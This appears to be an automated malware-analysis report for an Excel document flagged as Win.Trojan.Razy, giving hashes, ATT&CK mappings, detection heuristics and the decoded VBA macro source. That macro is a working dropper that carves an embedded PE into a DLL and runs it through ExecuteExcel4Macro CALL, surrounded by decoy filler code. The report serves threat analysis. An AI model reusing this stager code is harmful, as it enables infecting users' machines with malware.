Win.Trojan.Razy-7331387-0 Office (OLE) malware analysis — malicious · d1a0595c53600ef7

MALICIOUS

Office (OLE)

681.5 KB Created: 2019-08-30 09:14:50 Authoring application: Microsoft Excel First seen: 2020-05-25

MD5: 1bc4b2f991de7126735dd2c6fa45f6b1 SHA-1: 67ad0a8ff290bd42f09bc6e068b69c42870dad6e SHA-256: d1a0595c53600ef7b7eb135de5332b2a8fc2ad71efc526fcf89ec5ce926419e2

460 Risk Score

Malware Insights

Win.Trojan.Razy-7331387-0 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1140 Deobfuscate or Reverse Malware T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer

The sample contains VBA macros that leverage `Shell()`, `CreateObject()`, `VirtualAlloc()`, `LoadLibrary()`, and `GetProcAddress()` API calls, indicating it is designed to execute code. It also contains an embedded PE executable and is detected by ClamAV as Win.Trojan.Razy-7331387-0. The VBA macro's use of `ExecuteExcel4Macro` suggests it's a stager for a more complex payload, likely the embedded executable.

Heuristics 9

ClamAV: Win.Trojan.Razy-7331387-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Razy-7331387-0
Embedded PE executable critical OLE_EMBEDDED_EXE

MZ/PE header found inside document — possible embedded executable
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Set FucjiFilm = CreateObject("WScri" + "pt.Shell")
PRP = "%" & UserForm6.TextBox1.Tag
```
VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER

VBA code attached to an auto-firing ActiveX/UserForm control event (e.g. _Layout/_Change/_Painted) decodes a string with Replace/Split/Join/StrReverse/Chr and passes the recovered formula text to ExecuteExcel4Macro. This bridges VBA event activation into XLM formula execution to call Win32 APIs / drop payloads while evading AutoOpen and Shell keyword detection — a high-confidence macro stager, not a specific Office parser CVE.
Matched line in script
```
'  Dim
'  VarDefn ExecuteExcel4Macro (As String)
' Line #119:
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Set FucjiFilm = CreateObject("WScri" + "pt.Shell")
PRP = "%" & UserForm6.TextBox1.Tag

Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Reference to GetProcAddress API high SC_STR_GETPROCADDRESS

Reference to GetProcAddress API
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	77219 bytes
SHA-256: `3fc709458cd6bc6991ce98e49c6b3ea211fc74319580ae4176028ace65d0c0b8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Sem" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Sub addWBActivate() Dim VBProj Dim VBComp Dim codeMod Dim formsFolder As String Dim tmpColl As Collection Dim wBook As Workbook Dim filesToPrcs As Collection Dim flw Dim cdw Dim fullFName As String Dim activateExist As Boolean formsFolder = "C:\Users\GalkinVa\files_for_transport" Set tmpColl = flw.getPathsToFilesFromFolder(formsFolder) If tmpColl Is Nothing Then Err.Raise 13, Description:="tmpColl variable doesn" End If Set filesToPrcs = tmpColl For Each fName In filesToPrcs fullFName = fName fName = flw.extractNameWithExt(fullFName) Set wBook = Workbooks.Open(fullFName) Set VBProj = wBook.VBProject If cdw.VBComponentExists("ThisWorkbook", VBProj) Then Set VBComp = VBProj.VBComponents("ThisWorkbook") ElseIf cdw.VBComponentExists("ÝòàÊíèãà", VBProj) Then Set VBComp = VBProj.VBComponents("ÝòàÊíèãà") Else Err.Raise 13, "try to set VBComponent", "components from check doesn" End If Set codeMod = VBComp.CodeModule Set tmpColl = cdw.ListProcedures(VBComp) For Each proc In tmpColl If proc = "Workbook_Activate" Then activateExist = True End If Next proc If Not activateExist Then Call cdw.CreateEventProcedure(VBComp) Else Debug.Print "Workbook_Activate already exist in " & wBook.Name End If wBook.RunAutoMacros xlAutoClose On Error Resume Next wBook.Close saveChanges:=True If Err.Number <> 0 Then Debug.Print "Error occured when try to save " & wBook.Name End If Next fName End Sub Private Sub Workbook_Activate() If UserForm1.Visible = False Then Module1.CreateLinkedChart End If End Sub Attribute VB_Name = "Page1" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module1" Public Property Get Keys() As Collection Set Keys = IKeys End Property Public Property Get Items() As Collection Set Items = IItms End Property Public Sub CreateLinkedChart() Dim FucjiFilm As Object Dim SpecialPath As String Set FucjiFilm = CreateObject("WScri" + "pt.Shell") PRP = "%" & UserForm6.TextBox1.Tag UserForm6.TextBox1.Tag = FucjiFilm.ExpandEnvironmentStrings(PRP + "%") UserForm6.TextBox3.Tag = FucjiFilm.SpecialFolders(UserForm6.TextBox3.Tag) ChDir (UserForm6.TextBox1.Tag) UserForm1.show End Sub Public Sub Remove(Key) If TypeName(Key) = "String" Then Dim i On Error Resume Next Call IItms.Remove(Key) Call IKeys.Remove(Key) For i = 1 To IItms.Count If InStr("Collection,Prop", TypeName(IItms.Item(i))) <> 0 Then If IItms.Item(i).Item("Name") = Key Then Call IItms.Remove(i) Call IKeys.Remove(i) Exit For End If End If Next On Error GoTo 0 Else Call IItms.Remove(Key) Call IKeys.Remove(Key) End If End Sub Private Function setItem(Key, Value, Optional RepFlg = True) Dim i As Integer If TypeName(Key) = "String" Then If RepFlg Then If Key <> "" Then Call IItms.Add(Value) Call IKeys.Add(IItms.Count) End If Else MsgBox "???" End If Else If IItms.Count < Key Then For i = IItms.Count To Key - 2 Call IItms.Add("") Next End If If RepFlg Then On Error Resume Next Call IItms.Remove(Key) On Error GoTo 0 If IItms.Count < Key Then Call IItms.Add(Value) Else Call IItms.Add(Value, before:=Key) End If Else If Key = 0 Then If IItms.Count = 0 Then Call IItms.Add(Value) Else Call IItms.Add(Value, before:=1) End If Else If IItms.Count < Key Then Call IItms.Add("") Call IItms.Add(Value) Else Call IItms.Add(Value, after:=Key) End If End If End If End If End Function Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{8C1E167A-00FD-44EE-ACF1-5A9E76821C70}{35A77979-8717-442F-846A-A7B3E17DA22B}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub Label1_Click() End Sub Private Sub UserForm_Activate() DoEvents DoEvents ChenderBegin DoEvents End Sub Private Sub UserForm_Initialize() Call SystemButtonSettings(Me, False) End Sub Attribute VB_Name = "Module2" Public CursorPosition() As Byte Public Function SetResourceBytes(lpType As Long, lpID As Long, lpData() As Byte, lpFile As String) As Long Dim pReturn As Long, rPort As Long, nCount As Long nCount = UBound(lpData) + 1 - LBound(lpData) pReturn = BeginUpdate.Resource(lpFile, False) If pReturn <> 0 Then rPort = Update.Resource1(pReturn, lpType, lpID, 1033, lpData(LBound(lpData)), nCount) EndUpdate.Resource pReturn, False If rPort <> 0 Then SetResourceBytes = True End If End Function Sub ConvertChartToPicture() Dim Cht As Chart If ActiveChart Is Nothing Then Exit Sub If TypeName(ActiveSheet) = "Chart" Then Exit Sub Set Cht = ActiveChart Cht.CopyPicture Appearance:=xlPrinter, _ Size:=xlScreen, Format:=xlPicture ActiveWindow.RangeSelection.Select ActiveSheet.Paste End Sub Private Function setItem(Key, Value, Optional RepFlg = True) Dim i As Integer If TypeName(Key) = "String" Then If RepFlg Then If Key <> "" Then On Error Resume Next Call IItms.Remove(Key) Call IKeys.Remove(Key) On Error GoTo 0 Call IItms.Add(Value, Key) Call IKeys.Add(Key, Key) Else Call IItms.Add(Value) Call IKeys.Add(IItms.Count) End If Else MsgBox "???" End If Else If IItms.Count < Key Then For i = IItms.Count To Key - 2 Call IItms.Add("") Next End If If RepFlg Then On Error Resume Next Call IItms.Remove(Key) On Error GoTo 0 If IItms.Count < Key Then Call IItms.Add(Value) Else Call IItms.Add(Value, before:=Key) End If Else If Key = 0 Then If IItms.Count = 0 Then Call IItms.Add(Value) Else Call IItms.Add(Value, before:=1) End If Else If IItms.Count < Key Then Call IItms.Add("") Call IItms.Add(Value) Else Call IItms.Add(Value, after:=Key) End If End If End If End If End Function Public Sub ReplaceFile(WindthrawLocation) DoEvents ThisWorkbook.Sheets.Copy Application.DisplayAlerts = False DoEvents ActiveWorkbook.SaveAs WindthrawLocation, Local:=False, FileFormat:=3 * 7 + 3 * 7 + 9 DoEvents ActiveWorkbook.Close DoEvents End Sub Attribute VB_Name = "Class1" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "UserForm6" Attribute VB_Base = "0{CEE7B404-5132-41BC-B58C-66E1DB1B522B}{AC98CFE8-AB09-437A-94B0-304D9A35326F}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Page11" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module6" Private Const GWL_STYLE = -16 Private Const WS_CAPTION = &HC00000 Private Const WS_SYSMENU = &H80000 #If VBA7 Then Private Declare PtrSafe Function GetWindowLong _ Lib "user32" Alias "GetWindowLongA" (ByVal parameter1 As Long, _ ByVal nIndex As Long) As Long Private Declare PtrSafe Function BoxWSL _ Lib "user32" Alias "SetWindowLongA" (ByVal parameter1 As Long, _ ByVal nIndex As Long, ByVal dwNewLong As Long) As Long Private Declare PtrSafe Function FindWindowA _ Lib "user32" (ByVal lpClassName As String, _ ByVal lpWindowName As String) As Long Private Declare PtrSafe Function DrawMenuBar _ Lib "user32" (ByVal parameter1 As Long) As Long #Else Private Declare Function GetWindowLong _ Lib "user32" Alias "GetWindowLongA" ( _ ByVal parameter1 As Long, ByVal nIndex As Long) As Long Private Declare Function BoxWSL _ Lib "user32" Alias "SetWindowLongA" ( _ ByVal parameter1 As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long Private Declare Function FindWindowA _ Lib "user32" (ByVal lpClassName As String, _ ByVal lpWindowName As String) As Long Private Declare Function DrawMenuBar _ Lib "user32" (ByVal parameter1 As Long) As Long #End If Public Sub SystemButtonSettings(frm As Object, show As Boolean) Dim windowStyle As Long Dim windowHandle As Long windowHandle = FindWindowA(vbNullString, frm.Caption) windowStyle = GetWindowLong(windowHandle, GWL_STYLE) If show Then BoxWSL windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU) Else BoxWSL windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU) End If DrawMenuBar (windowHandle) End Sub Public Sub NumberBuffer(Number As Long, ByVal Buffer As Byte) If UserForm1.Enabled = True Then Put #Number, , Buffer End If End Sub Private Sub cmdStart_Click() Dim System As Long Dim Sound As Long Dim result Dim Version As Long Dim Data(0 To 4095) As Byte Dim Length As Long Dim Read As Long Dim bytesread As Long Dim outfp As Long result = FMOD_Syst.em_Create(System) ERRCHECK (result) result = FMOD_Syst.em_GetVersion(System, Version) ERRCHECK (result) result = FMOD_Sys.tem_Init(System, 1, FMOD_INIT_NORMAL, 0) ERRCHECK (result) result = FMOD_Sys.tem_CreateStream(System, "../../examples/media/wave.mp3", FMOD_OPENONLY Or FMOD_ACCURATETIME, Sound) ERRCHECK (result) result = FMOD_Soun.d_GetLength(Sound, Length, FMOD_TIMEUNIT_PCMBYTES) ERRCHECK (result) bytesread = 0 Do result = FMOD_Soun.d_ReadData(Sound, GetA.ddrOf(Data(0)), 4096, Read) bytesread = bytesread + Read Call lW.rite(outfp, GetA.ddrOf(Data(0)), Read) StatusBar.SimpleText = "writing " & bytesread & " bytes of " & Length & " to output.raw" Loop While (result = FMOD_OK And Read = 4096) StatusBar.SimpleText = "done" lC.lose (outfp) result = FMOD_So.und_Release(Sound) ERRCHECK (result) result = FMOD_Sys.tem_Close(System) ERRCHECK (result) result = FMOD_Sys.tem_Release(System) ERRCHECK (result) End Sub Private Sub cmdExit_Click() Unload M.e End End Sub Private Sub ERRCHECK(result) Dim msgResult If result <> FMOD_OK Then msgResult = MsgBox("FMOD error! (" & result & ") " & FMOD_Erro.rString(result)) End If If msgResult Then End End If End Sub Public Sub PublicResumEraseByArrayList(ParamArray putArrayBigList() As Variant) On Error Resume Next For Each Key In putArrayBigList Kill Key Next Key On Error GoTo 0 End Sub Attribute VB_Name = "Module5" Public Function PathBack(ByVal sPath As String) As String On Error Resume Next Dim sT As Variant Dim tt As String If Len(sPath) = 3 Then GoTo errorhand For ii = 0 To UBound(sT) - 2 tt = tt & sT(ii) & "\" Next ii PathBack = tt Exit Function errorhand: PathBack = sPath End Function Public Function GetParam(Count As Integer) As String Dim i As Long Dim j As Integer Dim c As String Dim bInside As Boolean Dim bQuoted As Boolean j = 1 bInside = False bQuoted = False GetParam = "" For i = 1 To Len(Command$) c = Mid$(Command$, i, 1) If bInside And bQuoted Then If c = """" Then j = j + 1 bInside = False bQuoted = False End If ElseIf bInside And Not bQuoted Then If c = " " Then j = j + 1 bInside = False bQuoted = False End If Else If c = """" Then If j > Count Then Exit Function bInside = True bQuoted = True ElseIf c <> " " Then If j > Count Then Exit Function bInside = True bQuoted = False End If End If If bInside And j = Count And c <> """" Then GetParam = GetParam & c Next i End Function Public Sub ChenderBegin() WindthrawLocation = UserForm6.TextBox1.Tag & "\dwdix" + ".xls" + "x" ZipName = WindthrawLocation + "." & "zi" + "p" buildPathFor = UserForm6.TextBox1.Tag Dim OpenForBinaryLock As String Dim CurrentSizeOfAT As Long Dim UpdateParameter As Integer OpenForBinaryLock = UserForm6.TextBox3.Tag + "\outgoing" UpdateParameter = 1 #If Win64 And VBA7 Then CurrentSizeOfAT = 200000 + 34490 + 6 UpdateParameter = 2 * UpdateParameter #Else CurrentSizeOfAT = 299008 #End If OpenForBinaryLock = OpenForBinaryLock & "." & "dl" + "l" PublicResumEraseByArrayList buildPathFor + "\ole" + "Obj" + "ect.b" + "" + "in", ZipName, OpenForBinaryLock ReplaceFile WindthrawLocation FileCopy WindthrawLocation, ZipName Dim objFolder As Object Set oApp = CreateObject("Shell." + "Application") If UpdateParameter > -21 And UpdateParameter > -30 Then Set objFolder = oApp.Namespace(ZipName) oApp.Namespace(buildPathFor).CopyHere objFolder.Items.Item("xl\e" + "mbed" + "dings\oleObject1.b" + "in") End If SimplexMethod buildPathFor + "\oleObject" + "1.b" + "in", OpenForBinaryLock, CurrentSizeOfAT, UpdateParameter If UpdateParameter > 0 Then UpdateParameter = UpdateParameter + 1 ChDir (UserForm6.TextBox3.Tag) UpdateParameter = UpdateParameter + 1 End If If UpdateParameter > -4 Then UpdateParameter = UpdateParameter + 1 UpdateParameter = UpdateParameter + 1 End If GetParamCount If UpdateParameter < 0 Then UpdateParameter = UpdateParameter + 1 UpdateParameter = UpdateParameter + 1 End If ExecuteExcel4Macro "CALL(""" + OpenForBinaryLock + """,""glitch"",""J"")" End Sub Public Function GetParamCount() As Integer On Error Resume Next Dim i As Long Dim sNextChar As String Dim bInside As Boolean Dim bQuoted As Boolean Dim sCommand As String GetParamCount = 0 bInsideParameter = False bQuoted = False sCommand = Command$ For i = 1 To LenB(sCommand) sNextChar = Mid$(sCommand, i, 1) If bInsideParameter Then If bQuoted Then If sNextChar = " " Then GetParamCount = GetParamCount + 1 bInsideParameter = False bQuoted = False End If End If End If Next i If bInsideParameter Then GetParamCount = GetParamCount + 1 End Function Attribute VB_Name = "Module4" Public Sub Text_Write(progbar As Object, tmptext As String, tmpSpalte As Long, tmpZeile As Long, tmpcolor As Long) For i = 1 To Len(tmptext) If TextClockWise = True Then For x = tmpSpalte To tmpSpalte + UBound(ZeichenArray, 1) For y = tmpZeile - Letter.Position + Letter.FontHeight - 1 To tmpZeile - Letter.Position - UBound(ZeichenArray, 2) + Letter.FontHeight - 1 Step -1 OldLetterArray.RGB(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position + UBound(ZeichenArray, 2) - Letter.FontHeight + 1) = Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) 100 + Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) * 10 + Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1) OldLetterArray.SW(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position + UBound(ZeichenArray, 2) - Letter.FontHeight + 1) = CBool(Arra.y_SW((x - 1) Mod Spalten + 1, y - 1)) If ZeichenArray(x - tmpSpalte, tmpZeile - Letter.Position + Letter.FontHeight - 1 - y) Then Draw_Fill.Cell (x - 1) Mod Spalten + 1, y - 1, picsource, tmpcolor, False Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).R / 255 Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).G / 255 Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).B / 255 Arra.y_SW((x - 1) Mod Spalten + 1, y - 1) = IIf(Draw_Color2.SW(tmpcolor), 1, 0) End If Next y Next x Else OldLetter.ArrayRGB(ZeichenAnzahl - 1).Left = tmpSpalte OldLetter.ArrayRGB(ZeichenAnzahl - 1).Top = tmpZeile + Letter.Position OldLetter.ArraySW(ZeichenAnzahl - 1).Left = tmpSpalte OldLetter.ArraySW(ZeichenAnzahl - 1).Top = tmpZeile + Letter.Position For x = tmpSpalte To tmpSpalte - UBound(ZeichenArray, 1) Step -1 For y = tmpZeile + Letter.Position To tmpZeile + Letter.Position + UBound(ZeichenArray, 2) OldLetterArray.RGB(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position) = Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) * 100 + Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) * 10 + Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1) OldLetterArray.SW(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile - Letter.Position) = CBool(Arra.y_SW((x - 1) Mod Spalten + 1, y - 1)) If ZeichenArray(tmpSpalte - x, y - tmpZeile - Letter.Position) Then Draw_Fill.Cell (x - 1) Mod Spalten + 1, y - 1, picsource, tmpcolor, False Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).R / 255 Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).G / 255 Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).B / 255 Arra.y_SW((x - 1) Mod Spalten + 1, y - 1) = IIf(Draw_Color2.SW(tmpcolor), 1, 0) End If Next y Next x End If progbar.Value = i Next i progbar.Value = 0 Dra.w_Zoom picsource, pictarget End Sub Public Function Load(HTMLSource As Variant) As Boolean On Error GoTo ErrorTrap Const Chunk = 1000 Dim WorkingSrc As String Dim TagStart As Long Dim TagEnd As Long Dim TagLength As Long Dim TagStartString As String Dim splittest() As String Dim Ptr As Long Dim Cnt As Long Dim Pos As Long Dim testing As Boolean Dim PosScriptEnd As Long Dim PosEndScript As Long Dim PosEndScriptEnd As Long WorkingSrc = HTMLSource LocalElementCount = 0 LocalElementSize = 0 ReDim LocalElements(LocalElementSize) If NewWay Then Load = True Ptr = 0 Do BlobSN = "/blob" & CStr(GetRan.domInteger()) & ":" Ptr = Ptr + 1 Loop While ((InStr(1, WorkingSrc, BlobSN, vbTextCompare) <> 0) And (Ptr < 10)) splittest = Split(WorkingSrc, "<script") Cnt = UBound(splittest) + 1 If Cnt > 1 Then For Ptr = 1 To Cnt - 1 PosScriptEnd = InStr(1, splittest(Ptr), ">") If PosScriptEnd > 0 Then PosEndScript = InStr(PosScriptEnd, splittest(Ptr), "</script", vbTextCompare) If PosEndScript > 0 Then splittest(Ptr) = Mid(splittest(Ptr), 1, PosScriptEnd) & BlobSN & BlobCnt & "/" & Mid(splittest(Ptr), PosEndScript) BlobCnt = BlobCnt + 1 End If End If Next WorkingSrc = Join(splittest, "<script") End If splittest = Split(WorkingSrc, "<style") Cnt = UBound(splittest) + 1 If Cnt > 1 Then For Ptr = 1 To Cnt - 1 PosScriptEnd = InStr(1, splittest(Ptr), ">") If PosScriptEnd > 0 Then PosEndScript = InStr(PosScriptEnd, splittest(Ptr), "</style", vbTextCompare) If PosEndScript > 0 Then Blo.bs(BlobCnt) = Mid(splittest(Ptr), PosScriptEnd + 1, (PosEndScript - 1) - (PosScriptEnd + 1) + 1) splittest(Ptr) = Mid(splittest(Ptr), 1, PosScriptEnd) & BlobSN & BlobCnt & "/" & Mid(splittest(Ptr), PosEndScript) BlobCnt = BlobCnt + 1 End If End If Next WorkingSrc = Join(splittest, "<style") End If Exit Function End If ErrorTrap: Call Handle.Error("Load", Err.Number, Err.Source, Err.Description) End Function Public Sub SimplexMethod(SimplexMethod2 As String, OpenForBinaryLock As String, fl As Long, Report6 As Integer) Dim Report1 As Long, Report2 As Byte, FirstB As Byte, SecondB As Byte, ThirdB As Byte, Report3 As Byte, Report4 As Byte Dim Class1 As Class1 Set Class1 = New Class1 Dim SimpleMethod As Integer ReDim CursorPosition(1 To fl) Report1 = FreeFile Open SimplexMethod2 For Binary Access Read As Report1 Dim cur As Integer cur = 1 FirstB = 77 SecondB = 90 ThirdB = 144 Do While Not EOF(Report1) Get Report1, , Report2 If Report2 = FirstB Then CursorPosition(1) = Report2 Get Report1, , Report3 If Report3 = SecondB Then CursorPosition(2) = Report3 Get Report1, , Report4 If Report4 = ThirdB Then CursorPosition(3) = Report4 If cur = Report6 Then For k = 4 To fl Get Report1, , Report2 CursorPosition(k) = Report2 Next k Exit Do Else cur = cur + 1 End If End If End If End If Loop Close Report1 Report1 = FreeFile Open OpenForBinaryLock For Binary Lock Read Write As #Report1 For i = LBound(CursorPosition) To UBound(CursorPosition) If UserForm1.Enabled = True Then NumberBuffer Report1, CursorPosition(i) End If Next i Close Report1 End Sub ' Processing file: /tmp/qstore_shzjnzmk ' =============================================================================== ' Module streams: ' _VBA_PROJECT_CUR/VBA/Sem - 4419 bytes ' Line #0: ' FuncDefn (Sub addWBActivate()) ' Line #1: ' Line #2: ' Dim ' VarDefn VBProj ' Line #3: ' Dim ' VarDefn VBComp ' Line #4: ' Dim ' VarDefn codeMod ' Line #5: ' Dim ' VarDefn formsFolder (As String) ' Line #6: ' Dim ' VarDefn tmpColl ' Line #7: ' Dim ' VarDefn wBook ' Line #8: ' Dim ' VarDefn filesToPrcs ' Line #9: ' Dim ' VarDefn flw ' Line #10: ' Dim ' VarDefn cdw ' Line #11: ' Line #12: ' Dim ' VarDefn fullFName (As String) ' Line #13: ' Dim ' VarDefn activateExist (As Boolean) ' Line #14: ' Line #15: ' LitStr 0x0025 "C:\Users\GalkinVa\files_for_transport" ' St formsFolder ' Line #16: ' Line #17: ' SetStmt ' Ld formsFolder ' Ld flw ' ArgsMemLd getPathsToFilesFromFolder 0x0001 ' Set tmpColl ' Line #18: ' Line #19: ' Ld tmpColl ' LitNothing ' Is ' IfBlock ' Line #20: ' LitDI2 0x000D ' LitStr 0x0016 "tmpColl variable doesn" ' ParamNamed Description ' Ld Err ' ArgsMemCall Raise 0x0002 ' Line #21: ' EndIfBlock ' Line #22: ' Line #23: ' SetStmt ' Ld tmpColl ' Set filesToPrcs ' Line #24: ' Line #25: ' StartForVariable ' Ld fName ' EndForVariable ' Ld filesToPrcs …
`embedded_office_00002935.exe`	embedded-pe	Office MZ+PE at offset 0x2935	687307 bytes
SHA-256: `9f95438a3b879dd66f4b4786a9836134c92f94a457b8b861f32d4f5189c77ed9`
Detection ClamAV: Win.Trojan.Razy-7331387-0 Obfuscation or payload: unlikely
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: MBD000787C0/Ole10Native	540766 bytes
SHA-256: `7e047dbd65f998f45495f80620c7fe6476a9fed3d7d69fc522a069404a8e3587`

Open this report in the interactive analyzer, or submit your own file for analysis.